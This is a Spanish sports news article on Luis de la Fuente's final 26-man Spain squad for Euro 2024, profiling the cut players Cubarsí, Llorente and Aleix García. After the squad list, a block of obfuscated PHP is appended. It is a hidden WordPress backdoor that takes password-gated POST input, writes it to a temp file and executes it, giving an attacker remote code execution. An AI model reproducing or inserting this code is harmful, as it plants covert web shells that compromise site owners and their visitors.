Los descartes de De la Fuente para la Eurocopa: Cubarsí, Llorente y Aleix; Ayoze entra

De la Fuente ha cerrado su lista de 26 y ha dejado fuera a Cubarsí, Llorente y Aleix García. Se quedan Vivian y Ayoze, que se estrenó ante Andorra con gol.

Cubarsí, Marcos Llorente y Aleix García se quedan fuera de la Eurocopa. El seleccionador, Luis de la Fuente, ha dado la lista definitiva de 26 jugadores,dos por puesto tras descartar a un central (se quedan Laporte, Nacho, Le Normand y Vivian), a un mediocentro (se quedan Zubimendi y Rodrigo), a un volante (se quedan Merino, Fabián, Baena, Pedri y Fermín). Y finalmente sí se quedan tres ‘nueves’: Joselu, Morata y Ayoze. Ninguno de los descartados viajará ya esta tarde a Palma, donde España juega ante Irlanda del Norte.

Pau Cubarsí (Barcelona)

17 años, 3 internacionalidades y toda una carrera por delante. Ha sido uno de los descartes de De la Fuente para la Eurocopa, lo que le asegura casi seguro ir a los Juegos. El 15 de marzo de 2024 fue seleccionado por primera vez por De la Fuente para representar a la Selección Absoluta en los amistosos preparativos para la Eurocopa 2024 contra Colombia y Brasil. Jugó los dos. También salió de inicio contra Andorra y parecía que le había ganado el puesto a Vivian, pero finalmente se queda el central del Athletic. Cubarsí tendrá su revancha personal en los JJ OO. La petición del Barça de que no doblara competiciones también puede haber influido.

Aleix García (Girona)

Llegó tarde. Una de las claves del éxito del Girona esta temporada. Un jugador casi todoterreno (tercer jugador de LaLiga que más distancia total ha recorrido), con presencia en las dos áreas y con grandes cualidades. Tanto que le están saliendo novias por Europa. En tareas defensivas destaca por ser un gran recuperador (el octavo que más balones ha rescatado esta temporada en Primera), mientras que la fase ofensiva y de creación de juego ha resaltado por ser el segundo máximo pasador, el que más centro al área ha realizado y el séptimo en asistencias de remate. Además, tiene olfato de gol: tres tantos y seis asistencias. Un jugador muy completo, pero que tampoco tuvo mucho protagonismo ante Andorra y que tiene complicada competencia: Zubimendi y Rodrigo.

Marcos Llorente (Atlético)

Era un repescado de la etapa de Luis Enrique, con quien debutó el 11 de noviembre de 2020 contra Países Bajos. Su polivalencia y fuerza física en el centro del campo jugaban a su favor; en contra, la fuerte competencia en el centro del campo. Tras 19 internacionalidades, Llorente tendrá que esperar a nuevas citas para seguir su trayectoria en la Roja. Desde hoy, un hincha más apoyando a España este verano.

La lista definitiva de 26:

PORTEROS: Unai Simón (Athletic Club), David Raya (Arsenal) y Alex Remiro (Real Sociedad).

DEFENSAS: Jesús Navas (Sevilla), Robin Le Normand (Real Sociedad), Alejandro Grimaldo (Bayer Leverkusen), Dani Carvajal y Nacho Fernández, Marc Cucurella (Chelsea), Aymeric Laporte (Al Nassr) y Daniel Vivian (Athletic Club).

CENTROCAMPISTAS: Rodri Hernández (Manchester City), Martín Zubimendi y Mikel Merino (Real Sociedad), Fabián Ruiz (PSG), Alex Baena (Villarreal), Pedri y Fermín López (FC Barcelona).

DELANTEROS: Lamine Yamal y Ferran Torres (FC Barcelona), Álvaro Morata (Atlético de Madrid), Mikel Oyarzabal (Real Sociedad), Nico Williams (Athletic Club), Joselu (Real Madrid), Dani Olmo (RB Leipzig), y Ayoze Pérez (Betis).

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}